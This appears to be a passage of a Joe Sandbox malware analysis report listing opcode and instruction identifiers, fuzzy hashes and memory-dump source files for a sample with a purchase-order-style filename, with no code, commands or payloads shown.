                                                          • Instruction ID: b0893b8d9f4900429242e7815258b5a5b843278ea404f15e82983e584252c467
                                                          • Opcode Fuzzy Hash: 0d4d6041fa19f1f2ad814795b83e651e37bd933310b3b9ece3f9452a21793f31
                                                          • Instruction Fuzzy Hash: 8341BD31B006149BCB64DBB8E54429EBBF6FF84710F4088AED45AD7A80DA34F941CF82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 688d6d4aee569e1d5f6442de6f348d3e554ad0b0cb55271367980d93df742341
                                                          • Instruction ID: 7c7807e3a69b679d54b13150032c7fb94cec564f90533bff7c89adec8d9705c8
                                                          • Opcode Fuzzy Hash: 688d6d4aee569e1d5f6442de6f348d3e554ad0b0cb55271367980d93df742341
                                                          • Instruction Fuzzy Hash: 0F41D171B00604CFD704DF69E488BAEB3F2EB85351F2481B9D1099B6AAC7B4DD81CB61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6cd6513da33ee7678431b99b4181fc00a28e5e2335dc16c8eefe526e8156da05
                                                          • Instruction ID: 2872b3f51ff75596ce691415a808a273ad1e40e5c4ce79631a3eaffade8bc108
                                                          • Opcode Fuzzy Hash: 6cd6513da33ee7678431b99b4181fc00a28e5e2335dc16c8eefe526e8156da05
                                                          • Instruction Fuzzy Hash: EA413B39B042504FDB499B38846877D3BE29FC5710F1545BED41ACB392DE348C8687A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2dc91b1f49ac9d4f6513e42497265331fd2bbc8544a7a6b2fcbd1489b907d6be
                                                          • Instruction ID: 6d5bab96c9fb13683d3e22ff9e30397d2360749e33918765e6f6baaebed42e64
                                                          • Opcode Fuzzy Hash: 2dc91b1f49ac9d4f6513e42497265331fd2bbc8544a7a6b2fcbd1489b907d6be
                                                          • Instruction Fuzzy Hash: B1411738B042544FDB59AB38846833E3BE29FC5710F1585BED51ACB391DE248C8687A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b3f8f8b2933bc8e60455a5c7d9cf82b654d7c2a3ba1ec6196d4bd20b2d81953
                                                          • Instruction ID: 182bc6249490808aa4c450763d9a11024a79201e8de44c292fc36df0e7bc0a50
                                                          • Opcode Fuzzy Hash: 0b3f8f8b2933bc8e60455a5c7d9cf82b654d7c2a3ba1ec6196d4bd20b2d81953
                                                          • Instruction Fuzzy Hash: 4B415E75A007489FCB25CFA9C944A6ABBF2FF88300F18899DD58697A51DB34F904CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e35dcf839c833d67f73c6cab1dfe59b818692136aba378301dfc2716a0711f7b
                                                          • Instruction ID: bfd28ecd564124417ab6c78facfe8b64ce2228ad1f6d66a70bebf403863e1684
                                                          • Opcode Fuzzy Hash: e35dcf839c833d67f73c6cab1dfe59b818692136aba378301dfc2716a0711f7b
                                                          • Instruction Fuzzy Hash: AD414E75B002059FDB18DF68C895B6ABBF2FB84310F14C4A9E9069B290DF75F841CB54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5eeabf5a4f87b4859d77bab474e63b1ba7f992655e819d23825aae3af7ae11e3
                                                          • Instruction ID: 5b8ad48fc8f835d31d176df551e0dbf5cbe2f4a91c22fa841337c110af3d8fb3
                                                          • Opcode Fuzzy Hash: 5eeabf5a4f87b4859d77bab474e63b1ba7f992655e819d23825aae3af7ae11e3
                                                          • Instruction Fuzzy Hash: 0551C274E01208DFDB19DFB9D584A9DBBB2BF88304F20852AD809AB351DB759D42CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 333de77f8b3238222ff8e5fa799499c0ffeb20d6a283b60dfb661ff349dbe229
                                                          • Instruction ID: 8542957bd1eabc4c9def8c6511040e317efd901fd9a285ba58c02362d0494e9a
                                                          • Opcode Fuzzy Hash: 333de77f8b3238222ff8e5fa799499c0ffeb20d6a283b60dfb661ff349dbe229
                                                          • Instruction Fuzzy Hash: C741F531B006099FCB259FA8C845BADBBB6FF89700F14856DE556EB3D0DB30A905CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac57415e71a1c453ce4bf19260ee620c4fa34502afd4fa625e9c740c257e8aa3
                                                          • Instruction ID: 4b6f6ed513651aa691e87c08c2700bc58e9e52b5f75a5e2d602bbf8f5a6955f2
                                                          • Opcode Fuzzy Hash: ac57415e71a1c453ce4bf19260ee620c4fa34502afd4fa625e9c740c257e8aa3
                                                          • Instruction Fuzzy Hash: AC41B170E01208DFDB19DFB9D584A9DBBB2BF88304F24856AD819AB361DB359D42CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7cd775b820ce69c9990fc25ebcf49c9187a972d2ae24d49ad6f4ebca4265826
                                                          • Instruction ID: 9463d816198d9e044b4793021f91db585addd789038347de402a3eddd25c0731
                                                          • Opcode Fuzzy Hash: c7cd775b820ce69c9990fc25ebcf49c9187a972d2ae24d49ad6f4ebca4265826
                                                          • Instruction Fuzzy Hash: 6241AE31A00615CFCB18CFA5C845BBEBBB2FF88324F048879D916E7291DB34A905CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e28eacb46a305e90fc9149b773bd81bae1f4889dec998d59f8842fe88ef5bfcf
                                                          • Instruction ID: 354a9949ca08b318611031a4e9c6cc729cf44740a939e6cc1ee8b994964eb6d0
                                                          • Opcode Fuzzy Hash: e28eacb46a305e90fc9149b773bd81bae1f4889dec998d59f8842fe88ef5bfcf
                                                          • Instruction Fuzzy Hash: 9F3108366105049FCB05DF59E888EA9BBB6FF48320F0680A8F5099B372C731EC55DB44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f0b3682cce310fc8f791ab1f115cb0a436b7bee18d06423c69129ba422a7a94
                                                          • Instruction ID: 0840eb8728ef736440d3baf971449b3808d3360227707849ee5282695770be54
                                                          • Opcode Fuzzy Hash: 0f0b3682cce310fc8f791ab1f115cb0a436b7bee18d06423c69129ba422a7a94
                                                          • Instruction Fuzzy Hash: 6F416078A40208CFEB14DF59D989BAEB7F2FB45300F288169D005AB3A5C7749CC5CB64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1b9b0ecd656da2c93886f170524fe6774ab24bbb0cb8153532beda1a90dcb21
                                                          • Instruction ID: c8ddec41adcb7e605ecf7bf23b7d3b215c3e3297c1ba65f03b68a0fb162ba2ba
                                                          • Opcode Fuzzy Hash: b1b9b0ecd656da2c93886f170524fe6774ab24bbb0cb8153532beda1a90dcb21
                                                          • Instruction Fuzzy Hash: 4B312C35B001199BDF04DFA4D864BEEBBB6FF88311F248069E805B7260DA75AD01CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67cb47a93ee5853aba7d8bbcdfac5690bd74d5c815b197af4c35d397ac2506de
                                                          • Instruction ID: d2ac25f5cb7798f279b2c1aaf1a3b45bebd7650c2f3e6f1219a42aa873a5b252
                                                          • Opcode Fuzzy Hash: 67cb47a93ee5853aba7d8bbcdfac5690bd74d5c815b197af4c35d397ac2506de
                                                          • Instruction Fuzzy Hash: EB311374D04218DBDB08CFA9D845BEEBBF2FB49320F40846AD815B7290D7B5A944CF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78cd7dcec7ef4f5c643ff18cc0b39e7228f745cf9f572c6ed4ae0d5103dd01b4
                                                          • Instruction ID: b4910a46c411f00f53921c8efd42280ee740edce65c49ab3460607774e82a532
                                                          • Opcode Fuzzy Hash: 78cd7dcec7ef4f5c643ff18cc0b39e7228f745cf9f572c6ed4ae0d5103dd01b4
                                                          • Instruction Fuzzy Hash: BC311770E05249DFDB04DFA9D485AEEBBF6FB88300F508069E804A7344D7B55A45CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 175332ef3353bf3cf085af062588554e1141eedeffbe2ca925c21f573bba661a
                                                          • Instruction ID: b3e46de4d9c26dbb37fe39278c9b5ad6b8a4735db1f7677ce07464e739a9287f
                                                          • Opcode Fuzzy Hash: 175332ef3353bf3cf085af062588554e1141eedeffbe2ca925c21f573bba661a
                                                          • Instruction Fuzzy Hash: B6310830B04645CFCB01EF74D8545AEBBB1EF8A300F05459AD451EB361DB349A06CBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38925fecf3a2dbea33f04c1332628a4735ce30b10727db2169b58c196b4f6ca8
                                                          • Instruction ID: 7cb0b57e46580d3b8de6db78506686132030962a5e6d258d7a7d05c5eaf7a20e
                                                          • Opcode Fuzzy Hash: 38925fecf3a2dbea33f04c1332628a4735ce30b10727db2169b58c196b4f6ca8
                                                          • Instruction Fuzzy Hash: DC311274D04218CBDB08CFA9D445BEEBBF6FB48320F509469D815B7290D7B5AA44CF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39720dc1a0ec444a9c62cd5b9328564cb832610ede439f2d5c813500fff775ef
                                                          • Instruction ID: 2f13b2e7c364d696346f7f64e3c869ee22275b566c999dd29ff4f6511af0907f
                                                          • Opcode Fuzzy Hash: 39720dc1a0ec444a9c62cd5b9328564cb832610ede439f2d5c813500fff775ef
                                                          • Instruction Fuzzy Hash: 2C313970E00218DFEB28CF69C854BADBBF2FB48321F2091A9D819E7251DB746981CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8cdbd6bae55baa552dbc9033fcfe03015736426eedc5dd7f0090ba433c02f3b7
                                                          • Instruction ID: 98d2c89f607f2145220f4aa3fef8220bb5984965d4f1e7268ae5674f6266ff0f
                                                          • Opcode Fuzzy Hash: 8cdbd6bae55baa552dbc9033fcfe03015736426eedc5dd7f0090ba433c02f3b7
                                                          • Instruction Fuzzy Hash: F531F4B0E10208CBDB08DFA9D445BEEBBB6FB88354F10C065D819A7284CB7869458F91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 322019c32a8d4bae4cdd883d708355e0e5f2a38dd72200471f2cd9fa4f5a2092
                                                          • Instruction ID: b4c754f90aaa9a709a65a8d04a13fad777c7c3a351735806c4dd5f39afe8f6da
                                                          • Opcode Fuzzy Hash: 322019c32a8d4bae4cdd883d708355e0e5f2a38dd72200471f2cd9fa4f5a2092
                                                          • Instruction Fuzzy Hash: 9041E6B4E10248CFDB08DFA9D445BEEBBB2FB88314F1081A5D859A7285CB7469458F91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b9574f821e954434a31ddbabe2c4edc3e3e3b076def94b770685f9a4ef6fd3f
                                                          • Instruction ID: e890d8a23b34132355c25fc29a23e3f0e46555123abd4f9432b1c2f1ccef8136
                                                          • Opcode Fuzzy Hash: 5b9574f821e954434a31ddbabe2c4edc3e3e3b076def94b770685f9a4ef6fd3f
                                                          • Instruction Fuzzy Hash: F631F674E046098FCB08CFAAD544BEEBBF2FB88320F44D1A9E815A3250D774A985CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 501c090f162ba18a5f5821e1fa3bf1bfacddeb5f25cc78b3d00185022821070f
                                                          • Instruction ID: a3fab8b43ceb2507df6dc00594c2dfe681ed318ca774d4b08bf7917b7b8d290d
                                                          • Opcode Fuzzy Hash: 501c090f162ba18a5f5821e1fa3bf1bfacddeb5f25cc78b3d00185022821070f
                                                          • Instruction Fuzzy Hash: D5314B71B042489FCB04CB68DCA5BAE7FB6EF85300F1440EED5489B292DE36AD05CB52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f7c731a2313eb022dd67e26ede1ccaaf1745b883b5e00aaec671883a1c4f33e4
                                                          • Instruction ID: ec5c97c21b348d4177df437e70e8cfe5d90e9b3b8bdc5e31cbb97c4efc58781d
                                                          • Opcode Fuzzy Hash: f7c731a2313eb022dd67e26ede1ccaaf1745b883b5e00aaec671883a1c4f33e4
                                                          • Instruction Fuzzy Hash: 103104B0E05249DFDB08CFA9D494AEEBBF6FB88300F508069E809A7244D7B55A45CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e498f77a7b4fbadae208af028143dd57287cf5af76ff2fd355437fbe38d4af9e
                                                          • Instruction ID: 99645857da9a93792fe9205a3b1dd83ff3094eb8fce025e1157f77335dff6e56
                                                          • Opcode Fuzzy Hash: e498f77a7b4fbadae208af028143dd57287cf5af76ff2fd355437fbe38d4af9e
                                                          • Instruction Fuzzy Hash: F231F574E046098FCB08CFAAD544BEEBBF2BB88320F04D16AE815A7250D774A945CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5d498d603f604825baee0ede61acd643377bbe471e4a596ba063b6a31b1662c
                                                          • Instruction ID: 9e5aa2a17a872be4da2c4d5796fd9e2b5838c80343ae9d09784eedf7f0de00fa
                                                          • Opcode Fuzzy Hash: e5d498d603f604825baee0ede61acd643377bbe471e4a596ba063b6a31b1662c
                                                          • Instruction Fuzzy Hash: DC311BB1E40248DBDB09EFA9C4957ADBFF1FB89300F0084A9D419A7250DBB85D45CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b2101f225ecf4605fb7dcea14eb9d5cde56bcfb2233ccdfb427b890aa1658be
                                                          • Instruction ID: 3bb18d21efe9c67a395daf04b941e1d375523229ff1151d0aa3780c706466670
                                                          • Opcode Fuzzy Hash: 7b2101f225ecf4605fb7dcea14eb9d5cde56bcfb2233ccdfb427b890aa1658be
                                                          • Instruction Fuzzy Hash: 1331B13680D3C08FE7569B2548606957FB0AF57300B5E45EBC684CF663D2389C5AD7A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba36da3ba477acaa4dd82152b93a9e8ec81a0099f00d29c6c376c6baa80e50b1
                                                          • Instruction ID: 4dd1dec5fde084146aa1c62ab5853db47a0e33f580b8382c3634f0557a256ba4
                                                          • Opcode Fuzzy Hash: ba36da3ba477acaa4dd82152b93a9e8ec81a0099f00d29c6c376c6baa80e50b1
                                                          • Instruction Fuzzy Hash: 402186323052008FC7148B6DE584A5ABBE9EF81312B1984BAE50DCB572DB25EC45C761
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef39abf78ac7a4cf8f67f5f164e1e40a386bd758c197c0980151647827d7e58f
                                                          • Instruction ID: 5c2d4f0c59a1c5bd576a2aa4a0f3f2c86c495f6252c150c8f4b4a1308c18cbe2
                                                          • Opcode Fuzzy Hash: ef39abf78ac7a4cf8f67f5f164e1e40a386bd758c197c0980151647827d7e58f
                                                          • Instruction Fuzzy Hash: 52310AB0E44208DBDB09EFA9C4546ADBFB1FB8A301F00C4A9D429A7250DBB85D45CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed18fc504e31d5ab6e3a937aaaa5d9c609b51833938baba13b4ef0f0f20de88d
                                                          • Instruction ID: a13a002137da374698ee3c807d28119e798de2380d6a7980513d243fc82a91f5
                                                          • Opcode Fuzzy Hash: ed18fc504e31d5ab6e3a937aaaa5d9c609b51833938baba13b4ef0f0f20de88d
                                                          • Instruction Fuzzy Hash: 5D312B71E002089FCB09DFA9D4916EEBBB2FF88310F10806AE515A7365DB355941CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64b529fb8278035ab4ab5ae91fb29af333f2cce64fe6c0524ea7b6c88e5d1453
                                                          • Instruction ID: 94098c741371490e95fd887d18f3d6f2a7c9fff7a21672ba6048db99fd19ed64
                                                          • Opcode Fuzzy Hash: 64b529fb8278035ab4ab5ae91fb29af333f2cce64fe6c0524ea7b6c88e5d1453
                                                          • Instruction Fuzzy Hash: 2E216034B10A098FCB00EF69D5549AEB7B6FF89700F10416AD556A7360EF34AA46CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 304682309d40d577388c620bb034b847b484bf2ca873bc07b4d49b6da114f5b9
                                                          • Instruction ID: 8a10add044a20b029798b6b0483f770e3dd83eee9032575f6d502057973adf19
                                                          • Opcode Fuzzy Hash: 304682309d40d577388c620bb034b847b484bf2ca873bc07b4d49b6da114f5b9
                                                          • Instruction Fuzzy Hash: EE31A270D01209EFD704DFA9D0A87AEBBF1FB49300F90C0A9C408A7254D7B44A85CB55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 29c79d2e85f7c8355313d36a74200a7bb9992a40be5e9d9d0298f6c52a2b9543
                                                          • Instruction ID: 394711dfddd7d232f1703d48058ceb4e73fa0dacc582541d09d866164ae54798
                                                          • Opcode Fuzzy Hash: 29c79d2e85f7c8355313d36a74200a7bb9992a40be5e9d9d0298f6c52a2b9543
                                                          • Instruction Fuzzy Hash: 9E315A30E44218DFEB28CF68C448BEDB7F2FB48365F2091A9D809A3245DB746985CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e8d2ec108149c09f489b301db7d1efb692aee7057941d6089198e19bb7cdaca
                                                          • Instruction ID: 3b645b891d2eb4cbe9b3fefc6cb8d26df69c062587d8979ebfe5b4843f0a83e3
                                                          • Opcode Fuzzy Hash: 0e8d2ec108149c09f489b301db7d1efb692aee7057941d6089198e19bb7cdaca
                                                          • Instruction Fuzzy Hash: 5321D574D04209CFDB08DFA9D4487EEBBF2EB89300F14C42AD555A3294DB749945DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89faba89e28d932f861d8253feb5a3fcb194cbc9a6f44bae4f577b3a8a591947
                                                          • Instruction ID: e55fe931bb83e551c099eab8b644d245390d157acd589791864e700a535658cb
                                                          • Opcode Fuzzy Hash: 89faba89e28d932f861d8253feb5a3fcb194cbc9a6f44bae4f577b3a8a591947
                                                          • Instruction Fuzzy Hash: 20217C71E04209DFDB58DEB4C404BAEBBFAEB44360F5080E6D819DB294E635EB01CB91
                                                          Memory Dump Source
